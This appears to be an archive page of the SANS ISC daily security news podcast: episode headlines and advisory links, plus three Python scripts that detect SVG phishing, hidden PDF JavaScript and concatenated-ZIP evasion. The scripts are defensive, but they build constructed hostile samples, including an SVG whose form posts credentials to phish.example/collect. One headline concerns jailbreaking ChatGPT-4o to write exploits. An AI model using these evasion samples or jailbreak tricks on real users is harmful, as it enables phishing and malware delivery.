SANS Internet Storm Center's Daily Network Security News Podcast

1,029 episodes — Page 8 of 21

Network Security News Summary for Wednesday December 04th, 2024

Files in Word; Sat Receiver DDoS Agent; Veeam Vuln; CVE-2024-49039 PoC

Extracting Files Embedded Inside Word Documents
https://isc.sans.edu/diary/Extracting%20Files%20Embedded%20Inside%20Word%20Documents/31486
Korea arrests CEO for adding DDoS feature to satellite receivers
https://www.bleepingcomputer.com/news/security/korea-arrests-ceo-for-adding-ddos-feature-to-satellite-receivers/
Veeam Vulnerabilities
https://www.veeam.com/kb4679
WPTaskScheduler Persistence and CVE-2024-49039 PoC
https://github.com/je5442804/WPTaskScheduler_CVE-2024-49039

keywords: word; satellite; korea; receiver; ddos; veeam; wptaskscheduler; scheduler

Dec 3, 2024 (5 min)

Network Security News Summary for Tuesday December 03rd, 2024

Credential Guard; AWS Key Rotation; Corrupt Document Phishing; IBM Security Verify Access Appliance Vuln

Credential Guard and Kerberos delegation
https://isc.sans.edu/diary/Credential%20Guard%20and%20Kerberos%20delegation/31488
The Day We Unveiled the Secret Rotation Illusion
https://www.clutch.security/blog/the-day-we-unveiled-the-secret-rotation-illusion
Corrupt Word Documents used in Phishing
https://x.com/anyrun_app/status/1861024182210900357
IBM Security Verify Access Appliance Vulnerabilities
https://www.ibm.com/support/pages/security-bulletin-multiple-security-vulnerabilities-were-found-ibm-security-verify-access-appliance-cve-2024-49803-cve-2024-49804-cve-2024-49805-cve-2024-49806

keywords: ibm; credentials; static; word; corrupt; aws; keys; apis; credential guard

Dec 2, 2024 (6 min)

Network Security News Summary for Monday December 02nd, 2024

AWS Honeypot + SIEM; Obfuscated Infostealer; Magento Skimmer; LogoFAIL Exploit

AWS DShield Sensor + DShield SIEM [Guest Diary]
https://isc.sans.edu/diary/SANS%20ISC%20Internship%20Setup%3A%20AWS%20DShield%20Sensor%20%2B%20DShield%20SIEM%20%5BGuest%20Diary%5D/31480
From a Regular Infostealer to its Obfuscated Version
https://isc.sans.edu/diary/From%20a%20Regular%20Infostealer%20to%20its%20Obfuscated%20Version/31484
Credit Card Skimmer Malware Targeting Magento Checkout Pages
https://blog.sucuri.net/2024/11/credit-card-skimmer-malware-targeting-magento-checkout-pages.html
LogoFAIL Exploited to Deploy Bootkitty, the first UEFI bootkit for Linux
https://www.binarly.io/blog/logofail-exploited-to-deploy-bootkitty-the-first-uefi-bootkit-for-linux
Stickers: https://isc.sans.edu/stickers.html (code PODCAST)

keywords: stickers; logofail; bootkitty; skimmer; magento; infostealer; obfuscation; aws; dshield; sensor; siem

Dec 2, 2024 (5 min)

Network Security News Summary for Wednesday November 27th, 2024

Network Detection for Redtail; Nearest Neighbor Attack; NachoVPN; Keycloak, PAN and PHP Patches

Using Zeek, Snort, and Grafana to Detect Crypto Mining Malware [Guest Diary]
https://isc.sans.edu/diary/%5BGuest%20Diary%5D%20Using%20Zeek%2C%20Snort%2C%20and%20Grafana%20to%20Detect%20Crypto%20Mining%20Malware/31472
The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access
https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/
Introducing NachoVPN: One VPN Server to Pwn Them All
https://blog.amberwolf.com/blog/2024/november/introducing-nachovpn---one-vpn-server-to-pwn-them-all/
Keycloak Patches
https://github.com/keycloak/keycloak/security/advisories/GHSA-93ww-43rr-79v3
Palo Alto Networks GlobalProtect App (CVE-2024-5921)
https://security.paloaltonetworks.com/CVE-2024-5921
PHP Updates
https://github.com/php/php-src/security/advisories/GHSA-g665-fm4p-vhff

keywords: php; pan; keycloak; nachovpn; miner; wifi; nearest neighbor

Nov 27, 2024 (6 min)

Network Security News Summary for Tuesday November 26th, 2024

Quick JS Deobfuscation; PDFs with Passwords; Fewer Russian Servers; QNAP Bug; 7-Zip Bug

Quick & Dirty Obfuscated JavaScript Analysis
https://isc.sans.edu/diary/Quick%20%26%20Dirty%20Obfuscated%20JavaScript%20Analysis/31468
Decrypting a PDF With a User Password
https://isc.sans.edu/diary/Decrypting%20a%20PDF%20With%20a%20User%20Password/31466
The strange case of disappearing Russian servers
https://isc.sans.edu/diary/The%20strange%20case%20of%20disappearing%20Russian%20servers/31476
QNAP Buggy Firmware Update
https://community.qnap.com/t/firmware-qts-5-2-2-2950-build-20241114-released/254
7-Zip Zstandard Decompression Integer Underflow
https://www.zerodayinitiative.com/advisories/ZDI-24-1532/
https://7-zip.org/download.html

keywords: 7zip; qnap; russia; servers; shodan; pdf; javascript

Nov 25, 2024 (4 min)

Network Security News Summary for Saturday November 23rd, 2024

SVG Phishing; FortiClient VPN Logging; Needrestart Vuln

Increase In Phishing SVG Attachments
https://isc.sans.edu/diary/Increase%20In%20Phishing%20SVG%20Attachments/31456
Logging blind spot revealed in FortiClient VPN
https://pentera.io/blog/FortiClient-VPN_logging-blind-spot-revealed/
Needrestart Vulnerability
https://www.qualys.com/2024/11/19/needrestart/needrestart.txt

keywords: needrestart; logging; forticlient; phishing; svg

Nov 21, 2024 (5 min)
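The SVG attachment item above names the technique but not how to check a file for it. The script below is an added example, not code from the ISC diary or from any project linked on this page: it parses an SVG with the standard library and flags the patterns that turn an "image" into a phishing page, namely inline or remote script, on* event-handler attributes, javascript: URIs, HTML embedded through foreignObject, and base64-wrapped URLs passed to atob(). The two sample SVGs, the hostname phish.example and the rule names are constructed for this example.

```python
import base64
import re
import xml.etree.ElementTree as ET

# Runs of base64 long enough to hide a URL; decoded and checked below.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _local(name):
    """Strip the {namespace} prefix ElementTree puts on tags and attributes."""
    return name.rsplit("}", 1)[-1]


def triage_svg(svg_text):
    """Return a list of findings for active-content patterns that turn an SVG
    'image' into a phishing page. An empty list means none of the rules fired."""
    findings = []
    root = ET.fromstring(svg_text)  # untrusted input: use defusedxml in production
    for el in root.iter():
        tag = _local(el.tag)
        text = el.text or ""
        if tag == "script":
            findings.append({"rule": "script-element", "detail": text.strip()[:80]})
            # Phishing SVGs hide the landing page as base64 inside atob(); recover it.
            for chunk in B64_RE.findall(text):
                try:
                    decoded = base64.b64decode(chunk, validate=True).decode("utf-8")
                except (ValueError, UnicodeDecodeError):
                    continue
                if decoded.startswith(("http://", "https://")):
                    findings.append({"rule": "base64-url", "detail": chunk, "decoded": decoded})
        elif tag == "foreignObject":
            findings.append({"rule": "foreign-object", "detail": "HTML document embedded in SVG"})
        elif tag == "form" and el.get("action"):
            findings.append({"rule": "form-action", "detail": el.get("action")})
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.startswith("on"):
                findings.append({"rule": "event-handler-attribute", "detail": f"<{tag} {name}={value!r}>"})
            elif name == "href" and value.strip().lower().startswith("javascript:"):
                findings.append({"rule": "javascript-uri", "detail": value})
            elif name == "href" and tag == "script":
                findings.append({"rule": "remote-script", "detail": value})
    return findings


# Constructed sample: a 1x1 "image" that redirects to a base64-hidden URL and
# carries an HTML credential form via foreignObject.
_HIDDEN = base64.b64encode(b"https://phish.example/login").decode()

SAMPLE_SVG = f"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="1" height="1">
  <a xlink:href="javascript:void(0)"><rect width="1" height="1" onclick="go()"/></a>
  <script type="text/javascript"><![CDATA[
    window.location = atob("{_HIDDEN}");
  ]]></script>
  <foreignObject width="1" height="1">
    <body xmlns="http://www.w3.org/1999/xhtml">
      <form action="https://phish.example/collect"><input name="pw"/></form>
    </body>
  </foreignObject>
</svg>"""

# Constructed benign sample: plain vector graphics, no active content.
BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4"/></svg>'

if __name__ == "__main__":
    for finding in triage_svg(SAMPLE_SVG):
        print(finding)
    print("benign:", triage_svg(BENIGN_SVG))
```

ElementTree does not fetch external entities, but it does expand internal ones, so feed real attachments through defusedxml or an entity-expansion limit. A non-empty finding list is a reason to quarantine or detonate, not proof of phishing; SVGs exported from design tools almost never contain script or foreignObject, which is what makes these rules cheap to alert on.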

Network Security News Summary for Friday November 22nd, 2024

Apple Patches; Oracle PLM Vulns; OFBiz Patches; D-Link EOL Product Vulns

Apple Patches Two Exploited Vulnerabilities
https://isc.sans.edu/diary/Apple%20Fixes%20Two%20Exploited%20Vulnerabilities/31452
Oracle Patch for Agile Product Lifecycle Management CVE-2024-21287
https://www.oracle.com/security-alerts/alert-cve-2024-21287.html
OFBiz Patches CVE-2024-47208 CVE-2024-48962
https://nvd.nist.gov/vuln/detail/CVE-2024-47208
https://seclists.org/oss-sec/2024/q4/95
D-Link Warns of Vulnerability in EOL Devices
https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10415

keywords: ofbiz; d-link; oracle; apple

Nov 21, 2024 (5 min)

Network Security News Summary for Thursday November 21st, 2024

Nov 20, 2024 (6 min)

Network Security News Summary for Wednesday November 20th, 2024

Unpatched Citrix Vuln Exploited; Microsoft Power Pages Issues; ManageEngine ADAudit Plus SQL Injection

Exploit attempts for unpatched Citrix vulnerability CVE-2024-8068/CVE-2024-8069
https://isc.sans.edu/diary/Exploit+attempts+for+unpatched+Citrix+vulnerability/31446
https://support.citrix.com/s/article/CTX691941-citrix-session-recording-security-bulletin-for-cve20248068-and-cve20248069?language=en_US
Microsoft Power Pages: Data Exposure Reviewed
https://appomni.com/ao-labs/microsoft-power-pages-data-exposure-reviewed/
Zohocorp ManageEngine ADAudit Plus Vulnerable To SQL Injection Attacks CVE-2024-49574
https://www.manageengine.com/products/active-directory-audit/cve-2024-49574.html

keywords: zohocorp; manageengine; adaudit; microsoft; power pages; citrix

Nov 18, 2024 (5 min)

Network Security News Summary for Tuesday November 19th, 2024

Ancient Vulns; GitHub Impersonations; Palo Alto and Fortinet Still Not Secure

Ancient TP-Link Backdoor Discovered by Attackers
https://isc.sans.edu/diary/Ancient%20TP-Link%20Backdoor%20Discovered%20by%20Attackers/31442
GitHub Projects Targeted with Malicious Commits To Frame Researchers
https://www.bleepingcomputer.com/news/security/github-projects-targeted-with-malicious-commits-to-frame-researcher/
Palo Alto and Fortinet Vulnerabilities
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
https://security.paloaltonetworks.com/PAN-SA-2024-0015
https://www.volexity.com/blog/2024/11/15/brazenbamboo-weaponizes-forticlient-vulnerability-to-steal-vpn-credentials-via-deepdata/

keywords: paloalto; pan; fortinet; github; impersonation; tp-link

Nov 17, 2024 (6 min)

Network Security News Summary for Wednesday November 13th, 2024

Microsoft Patch Tuesday; CISA Top Exploited Vulns; APT Embeds Malware Using Flutter

Microsoft November 2024 Patch Tuesday
https://isc.sans.edu/diary/Microsoft%20November%202024%20Patch%20Tuesday/31438
CISA Top Routinely Exploited Vulnerabilities
https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-317a
APT Actors Embed Malware within macOS Flutter Applications
https://www.jamf.com/blog/jamf-threat-labs-apt-actors-embed-malware-within-macos-flutter-applications/

keywords: apt; macos; flutter; cisa; microsoft; patches

Nov 13, 2024 (5 min)

Network Security News Summary for Tuesday November 12th, 2024

PDF Phish Analysis; Mazda Vulns; Ruby SAML Vuln Details; Veeam Vuln; Dell SONiC Vulns; Fake FBI EDRs

PDF Object Streams
https://isc.sans.edu/diary/PDF%20Object%20Streams/31430
Mazda Infotainment Vulnerabilities
https://www.zerodayinitiative.com/blog/2024/11/7/multiple-vulnerabilities-in-the-mazda-in-vehicle-infotainment-ivi-system
Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight
https://workos.com/blog/ruby-saml-cve-2024-45409
Veeam Backup Enterprise Manager Vulnerability
https://www.veeam.com/kb4682
Security Update for Dell Enterprise SONiC Distribution Vulnerabilities
https://www.dell.com/support/kbdoc/en-us/000245655/dsa-2024-449-security-update-for-dell-enterprise-sonic-distribution-vulnerabilities
Easy Access to Information for Conducting Fraudulent Emergency Data Requests Impacts US-Based Companies and Law Enforcement Agencies
https://www.ic3.gov/CSA/2024/241104.pdf

keywords: fbi; dell; sonic; veeam; workos; ruby; saml; pdf; pdfid; pdf-parser

Nov 11, 2024 (6 min)
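The PDF Object Streams diary above concerns objects packed inside a compressed /ObjStm, where a string search over the raw file never sees them. As an added example (not pdfid, pdf-parser or any code from the linked diary), the script below builds a constructed PDF fixture whose catalog and /OpenAction JavaScript exist only inside a FlateDecode object stream, then compares a shallow keyword count against one that first inflates every object stream it finds. It handles only the /FlateDecode filter with a direct /Length value; the object numbers, the app.alert payload and the missing xref stream are all properties of the made-up fixture, not of any real sample.

```python
import re
import zlib

# Keywords a triage pass counts; /OpenAction next to /JavaScript is the classic
# "run on open" pairing, and a non-zero /ObjStm count means a raw-byte count is incomplete.
KEYWORDS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/Launch", b"/ObjStm")
OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")


def build_sample_pdf():
    """Constructed fixture (not viewer-valid: no xref stream). The catalog (6 0)
    and its JavaScript action (5 0) exist only inside object stream 7 0, so
    neither /OpenAction nor /JavaScript appears in the raw file bytes."""
    inner = [
        (5, b"<< /S /JavaScript /JS (app.alert('constructed sample')) >>"),
        (6, b"<< /Type /Catalog /Pages 2 0 R /OpenAction 5 0 R >>"),
    ]
    header, body = b"", b""
    for num, obj in inner:  # ObjStm layout: "objnum offset" pairs, then the objects
        header += b"%d %d " % (num, len(body))
        body += obj + b"\n"
    data = zlib.compress(header + body)
    objstm = (b"7 0 obj\n<< /Type /ObjStm /N %d /First %d /Length %d /Filter /FlateDecode >>\nstream\n"
              % (len(inner), len(header), len(data)) + data + b"\nendstream\nendobj\n")
    pages = b"2 0 obj\n<< /Type /Pages /Kids [] /Count 0 >>\nendobj\n"
    return b"%PDF-1.5\n" + pages + objstm + b"trailer\n<< /Root 6 0 R >>\n%%EOF\n"


def extract_object_streams(pdf):
    """Inflate every /ObjStm and return {object number: object bytes} for the
    objects packed inside. Handles /FlateDecode with a direct /Length only."""
    found = {}
    for m in OBJ_RE.finditer(pdf):
        start = m.end()
        # The object's dictionary ends at whichever of "stream" / "endobj" comes first.
        s, e = pdf.find(b"stream", start), pdf.find(b"endobj", start)
        ends = [x for x in (s, e) if x >= 0]
        dict_end = min(ends) if ends else len(pdf)
        dictionary = pdf[start:dict_end]
        if dict_end != s or b"/ObjStm" not in dictionary:
            continue
        n = int(re.search(rb"/N\s+(\d+)", dictionary).group(1))
        first = int(re.search(rb"/First\s+(\d+)", dictionary).group(1))
        length = int(re.search(rb"/Length\s+(\d+)", dictionary).group(1))
        pos = s + len(b"stream")
        pos += 2 if pdf.startswith(b"\r\n", pos) else (1 if pdf.startswith(b"\n", pos) else 0)
        inflated = zlib.decompress(pdf[pos:pos + length])
        # The first /First bytes hold N (objnum, offset) pairs; offsets are relative to /First.
        nums = [int(x) for x in inflated[:first].split()]
        pairs = list(zip(nums[0::2], nums[1::2]))[:n]
        for i, (num, off) in enumerate(pairs):
            end = pairs[i + 1][1] if i + 1 < len(pairs) else len(inflated) - first
            found[num] = inflated[first + off:first + end].strip()
    return found


def count_keywords(pdf, deep=False):
    """Count KEYWORDS in the raw bytes; with deep=True also in the objects
    recovered from object streams, which is what a useful scan has to do."""
    haystack = pdf
    if deep:
        haystack += b"\n" + b"\n".join(extract_object_streams(pdf).values())
    return {k: haystack.count(k) for k in KEYWORDS}


if __name__ == "__main__":
    sample = build_sample_pdf()
    print("shallow:", count_keywords(sample))
    print("deep:   ", count_keywords(sample, deep=True))
    for num, obj in extract_object_streams(sample).items():
        print(f"{num} 0 obj (from ObjStm):", obj.decode())
```

The shallow pass reports zero for /JavaScript and /OpenAction but one /ObjStm, which is the tell: any time an object stream is present, a keyword count that does not inflate it is not a result, it is an absence of one. Real samples add indirect /Length values, multiple filters and xref streams, which is why the full tooling exists; the point here is only where the hidden objects live.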

Network Security News Summary for Monday November 11th, 2024

zipdump and PKZIP; Am I Isolated; iOS Lock Reboot; PAN Bulletin; D-Link Vulns

zipdump and PKZIP records
https://isc.sans.edu/diary/zipdump%20%26%20PKZIP%20Records/31428
Am I Isolated
https://github.com/edera-dev/am-i-isolated
Locked iPhones Reboot
https://www.404media.co/police-freak-out-at-iphones-mysteriously-rebooting-themselves-locking-cops-out/
https://x.com/naehrdine/status/1854896392797360484
Palo Alto Networks Bulletin
https://security.paloaltonetworks.com/PAN-SA-2024-0015
D-Link Vulnerability
https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07

keywords: dlink; palo alto networks; pan; pan-os; iphones; docker; isolated; zipdump; pkzip

Nov 10, 2024 (5 min)

Network Security News Summary for Friday November 08th, 2024

Malicious Steam Bruteforcer; Cisco and Veeam Patches; ZIP File Issues; File Upload Dangers

Steam Account Checker Poisoned with Infostealer
https://isc.sans.edu/diary/Steam%20Account%20Checker%20Poisoned%20with%20Infostealer/31420
Cisco Ultra Reliable Wireless Backhaul Vulnerability
https://www.cisco.com/site/us/en/products/networking/industrial-wireless/ultra-reliable-wireless-backhaul/index.html
Breaking Down Multipart Parsers: File upload validation bypass
https://blog.sicuranext.com/breaking-down-multipart-parsers-validation-bypass/
Evasive ZIP Concatenation: Trojan Targets Windows Users
https://perception-point.io/blog/evasive-concatenated-zip-trojan-targets-windows-users/
Veeam Backup Enterprise Manager Vulnerability (CVE-2024-40715)
https://www.veeam.com/kb4682
SANS Holiday Hack Challenge
https://www.sans.org/mlp/holiday-hack-challenge-2024

keywords: holiday; hack; challenge; sans; veeam; backup; zip; concatenation; file upload; parser; cisco; steam

Nov 7, 2024 (5 min)
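Two items on this page touch the same structure: the zipdump look at PKZIP records (November 11 episode) and the concatenated-ZIP trojan (the episode above). The script below is an added example, not zipdump and not code from either article: it builds two small archives with the standard library, concatenates them, and shows that zipfile, which trusts the end-of-central-directory record at the end of the file, lists only the second archive, while a walk over local file headers from offset 0 recovers both. Which archive a given unpacker shows depends on which of those two strategies it uses, and that disagreement is the evasion. The file names and contents are constructed; the "payload" is an MZ-prefixed byte string standing in for an executable.

```python
import io
import struct
import zipfile

LFH_SIG = b"PK\x03\x04"   # local file header signature
EOCD_SIG = b"PK\x05\x06"  # end of central directory record signature
# sig, version, flags, method, time, date, crc32, compressed size, uncompressed size, name len, extra len
LFH_FMT = "<4sHHHHHIIIHH"
LFH_SIZE = struct.calcsize(LFH_FMT)  # 30 bytes


def build_zip(members):
    """Build an in-memory ZIP from {name: bytes} using the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def local_header_names(blob):
    """Walk every local file header from offset 0, no matter which central
    directory claims it. Each header's own compressed-size field is used to
    step over the member data; if the data-descriptor flag (bit 3) is set that
    field is zero, so the walk falls back to searching for the next signature."""
    names, off = [], 0
    while True:
        off = blob.find(LFH_SIG, off)
        if off < 0 or off + LFH_SIZE > len(blob):
            return names
        (_sig, _ver, flags, _method, _time, _date, _crc,
         csize, _usize, nlen, xlen) = struct.unpack_from(LFH_FMT, blob, off)
        names.append(blob[off + LFH_SIZE:off + LFH_SIZE + nlen].decode("utf-8", "replace"))
        off += LFH_SIZE + nlen + xlen + (0 if flags & 0x08 else csize)


def analyze(blob):
    """Compare what zipfile reports (it follows the trailing EOCD, so only the
    last archive) with what a header walk finds, and count EOCD records."""
    visible = zipfile.ZipFile(io.BytesIO(blob)).namelist()
    headers = local_header_names(blob)
    hidden = [n for n in headers if n not in visible]
    # A 4-byte signature can occur inside compressed data by chance; treat the count as a hint.
    eocds = blob.count(EOCD_SIG)
    return {"visible": visible, "local_headers": headers, "hidden": hidden,
            "eocd_records": eocds, "concatenated": eocds > 1 or bool(hidden)}


def build_samples():
    """Constructed fixtures: (plain decoy archive, payload archive + decoy archive)."""
    payload = build_zip({"invoice.exe": b"MZ" + b"\x90" * 64})  # stand-in bytes, not a real PE
    decoy = build_zip({"invoice.pdf": b"%PDF-1.4 harmless decoy text"})
    return decoy, payload + decoy


if __name__ == "__main__":
    decoy_only, concatenated = build_samples()
    print("single archive:", analyze(decoy_only))
    print("concatenated:  ", analyze(concatenated))
```

For the concatenated blob, zipfile sees only invoice.pdf, the header walk sees invoice.exe as well, and two EOCD records are present. Either of the last two signals is enough for a mail or upload gateway to reject the file, since a legitimately produced archive has exactly one central directory and no local headers outside it; the same walk is also what zipdump-style tooling relies on when the directory is damaged on purpose.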

Network Security News Summary for Thursday November 07th, 2024

Web Attack Surge; Air Fryer Privacy; Pygmy Goat Malware; Apple Vuln PoC; HPE Aruba Critical Vuln

Insights from August Web Traffic Surge [Guest Diary]
https://isc.sans.edu/forums/diary/%5BGuest%20Diary%5D%20Insights%20from%20August%20Web%20Traffic%20Surge/31408/
Talkative Air Fryer
https://www.which.co.uk/policy-and-insight/article/why-is-my-air-fryer-spying-on-me-which-reveals-the-smart-devices-gathering-your-data-and-where-they-send-it-a9Fa24K6gY1c
Pygmy Goat Malware Report
https://www.ncsc.gov.uk/section/keep-up-to-date/malware-analysis-reports
Apple CVE-2024-44258 PoC Exploit
https://github.com/ifpdz/CVE-2024-44258
HPE Aruba Vulnerabilities
https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbnw04722en_us&docLocale=en_US

keywords: hpe; aruba; apple; poc; pygmy; goat

Nov 6, 2024 (4 min)

Network Security News Summary for Wednesday November 06th, 2024

Python RAT Screen Share; Android Security Bulletin; VMs Delivering Malware; Fake DocuSign Invoices

Python RAT with a Nice Screensharing Feature
https://isc.sans.edu/diary/Python%20RAT%20with%20a%20Nice%20Screensharing%20Feature/31414
Android Security Bulletin November 2024
https://source.android.com/docs/security/bulletin/2024-11-01
Malware Delivered as Virtual Machine
https://www.securonix.com/blog/crontrap-emulated-linux-environments-as-the-latest-tactic-in-malware-staging/
Fake DocuSign Invoices
https://lab.wallarm.com/attackers-abuse-docusign-api-to-send-authentic-looking-invoices-at-scale/

keywords: docusign; malware; vm; android; november; python; rat; screensharing

Nov 5, 2024 (5 min)

Network Security News Summary for Tuesday November 05th, 2024

Analyzing Encrypted PDFs; Okta Passwordless Password Leak; QuRouter Patch; Google AI Tool Finds SQLite Vuln; ADManager Plus SQL Injection

Analyzing an Encrypted Phishing PDF
https://isc.sans.edu/diary/Analyzing%20an%20Encrypted%20Phishing%20PDF/31404
Okta Verify Desktop MFA for Windows Passwordless Login CVE-2024-9191
https://trust.okta.com/security-advisories/okta-verify-desktop-mfa-for-windows-passwordless-login-cve-2024-9191/
QNAP QuRouter Vulnerability and Patch
https://www.qnap.com/en/security-advisory/qsa-24-45
From Naptime to Big Sleep
https://googleprojectzero.blogspot.com/2024/10/from-naptime-to-big-sleep.html
Authenticated SQL injection vulnerability - ManageEngine ADManager Plus CVE-2024-48878
https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2024-48878.html

keywords: zoho; manageengine; admanager; naptime; big sleep; qnap; qurouter; okta; pdf; qpdf; pdf-parser

Nov 4, 2024 (4 min)

Network Security News Summary for Monday November 04th, 2024

Odd SSH Username; QPDF; Okta bcrypt Issue; Synology Patches; Fake LastPass Reviews

October 2024 Activity with Username chenzilong
https://isc.sans.edu/diary/October%202024%20Activity%20with%20Username%20chenzilong/31400
qpdf: Extracting PDF Streams
https://isc.sans.edu/diary/qpdf%3A%20Extracting%20PDF%20Streams/31406
Okta bcrypt issue
https://trust.okta.com/security-advisories/okta-ad-ldap-delegated-authentication-username/
https://medium.com/@rajat29gupta/how-bcrypts-limitations-contributed-to-okta-s-vulnerability-a-lesson-for-developers-39425c644ed5
Synology Vulnerabilities
https://www.synology.com/de-de/security/advisory/Synology_SA_24_19
https://www.synology.com/de-de/security/advisory/Synology_SA_24_18
LastPass Fake Reviews
https://blog.lastpass.com/posts/fake-web-store-reviews-attempting-to-steal-customer-data

keywords: lastpass; synology; bcrypt; okta; chenzilong; qpdf

Nov 3, 2024 (5 min)

Network Security News Summary for Thursday October 31st, 2024

RDP Gateway Scans; CyberPanel Exploited; Windows Themes Spoofing; QNAP Patches; Facebook Malvertising

Scans for RDP Gateways
https://isc.sans.edu/diary/Scans%20for%20RDP%20Gateways/31398
CyberPanel Exploited
https://www.bleepingcomputer.com/news/security/massive-psaux-ransomware-attack-targets-22-000-cyberpanel-instances/
Windows Themes Files Spoofing CVE-2024-38030
https://blog.0patch.com/2024/10/we-patched-cve-2024-38030-found-another.html
QNAP Patches CVE-2024-50388, CVE-2024-50387
https://www.qnap.com/en/security-advisory/qsa-24-41
Facebook Malvertising
https://www.bitdefender.com/en-us/blog/labs/unmasking-the-sys01-infostealer-threat-bitdefender-labs-tracks-global-malvertising-campaign-targeting-meta-business-pages/

keywords: facebook; malvertising; business pages; meta; qnap; patches; windows themes; cyberpanel; NTLM; RDP; gateway; scans

Oct 30, 2024 (5 min)

Network Security News Summary for Wednesday October 30th, 2024

CyberPanel RCE; Spring WebFlux Vuln; MSFT Implements DANE; Attackers Enable RDP

Critical RCE Vulnerability in CyberPanel
https://dreyand.rs/code/review/2024/10/27/what-are-my-options-cyberpanel-v236-pre-auth-rce
Spring WebFlux Vulnerability
https://access.redhat.com/security/cve/cve-2024-38821
https://spring.io/security/cve-2024-38821
Inbound SMTP DANE with DNSSEC for Exchange Online
https://techcommunity.microsoft.com/t5/exchange-team-blog/announcing-general-availability-of-inbound-smtp-dane-with-dnssec/ba-p/4281292
HeptaX: Unauthorized RDP Connections for Cyberespionage Operations
https://cyble.com/blog/heptax-unauthorized-rdp-connections-for-cyberespionage-operations/

keywords: heptax; dane; dnssec; rdp; spring; webflux; rce; cyberpanel

Oct 29, 2024 (6 min)

Network Security News Summary for Tuesday October 29th, 2024

Apple Updates; HTML File Phishing via Telegram; ChatGPT-4o Encoding Evasion

Apple Updates Everything
https://isc.sans.edu/diary/Apple%20Updates%20Everything/31390
Self-contained HTML Phishing Attachment Using Telegram to Exfiltrate Credentials
https://isc.sans.edu/diary/Selfcontained+HTML+phishing+attachment+using+Telegram+to+exfiltrate+stolen+credentials/31388/
ChatGPT-4o Guardrail Jailbreak: Hex Encoding for Writing CVE Exploits
https://0din.ai/blog/chatgpt-4o-guardrail-jailbreak-hex-encoding-for-writing-cve-exploits

keywords: chatgpt; guardrails; apple; html phishing

Oct 28, 2024 (5 min)

Network Security News Summary for Monday October 28th, 2024

Old Ivanti Vulns Exploited; Arcadyan WiFi RCE; Okta iOS Vuln; TeamTNT Docker Hunt

Two currently (old) exploited Ivanti vulnerabilities
https://isc.sans.edu/diary/Two%20currently%20%28old%29%20exploited%20Ivanti%20vulnerabilities/31384
Arcadyan FMIMG51AX000J (WiFi Alliance) RCE CVE-2024-41992
https://ssd-disclosure.com/ssd-advisory-arcadyan-fmimg51ax000j-wifi-alliance-rce/
Okta iOS App Vulnerability CVE-2024-10327
https://trust.okta.com/security-advisories/okta-verify-for-ios-cve-2024-10327/
Threat Alert: TeamTNT's Docker Gatling Gun Campaign
https://www.aquasec.com/blog/threat-alert-teamtnts-docker-gatling-gun-campaign/

keywords: teamtnt; docker; miner; okta; ios; arcadyan; wifi; alliance; ivanti

Oct 28, 2024 (5 min)

Network Security News Summary for Friday October 25th, 2024

Dev Features in Prod; Cisco VPN DoS and Authenticated RCE; Hard-Coded Cloud Credentials

Development Features Enabled in Production
https://isc.sans.edu/diary/Development%20Features%20Enabled%20in%20Prodcution/31380
Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials
https://blog.talosintelligence.com/large-scale-brute-force-activity-targeting-vpns-ssh-services-with-commonly-used-login-credentials/
Cisco Secure Firewall Management Center Software Command Injection Vulnerability
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-v3AWDqN7
Exposing the Danger Within: Hardcoded Cloud Credentials in Popular Mobile Apps
https://www.security.com/threat-intelligence/exposing-danger-within-hardcoded-cloud-credentials-popular-mobile-apps

keywords: cloud; mobile app; cisco; ssh; dos; vpn; development

Oct 24, 2024 (5 min)

Network Security News Summary for Thursday October 24th, 2024

Shell Scripts; FortiManager Mess; SharePoint Exploit; OpenSSL Patch; Reduced Cert Lifetime

Everybody Loves Bash Scripts. Including Attackers.
https://isc.sans.edu/diary/Everybody%20Loves%20Bash%20Scripts.%20Including%20Attackers./31376
FortiManager Exploited Vulnerability
https://www.fortiguard.com/psirt/FG-IR-24-423
SharePoint Exploit
https://www.cisa.gov/news-events/alerts/2024/10/22/cisa-adds-one-known-exploited-vulnerability-catalog
https://github.com/testanull/MS-SharePoint-July-Patch-RCE-PoC
OpenSSL Vulnerability
https://openssl-library.org/news/secadv/20241016.txt
Reduced Certificate Lifetime
https://github.com/cabforum/servercert/pull/553

keywords: certificate; openssl; cisa; sharepoint; fortinet; fortimanager; bash; scripts

Oct 23, 2024 (6 min)

Network Security News Summary for Wednesday October 23rd, 2024

HTTP vs. HTTPS; VMware, UniFi, Roundcube, Atlassian and OneDev Patches, Vulnerabilities and Exploits

How much HTTP (not HTTPS) Traffic is Traversing Your Perimeter?
https://isc.sans.edu/diary/How%20much%20HTTP%20%28not%20HTTPS%29%20Traffic%20is%20Traversing%20Your%20Perimeter%3F/31372
VMSA-2024-0019: VMware vCenter Server updates address heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813)
https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
UniFi Security Advisory Bulletin 043
https://community.ui.com/releases/Security-Advisory-Bulletin-043-043/28e45c75-314e-4f07-a4f3-d17f67bd53f7
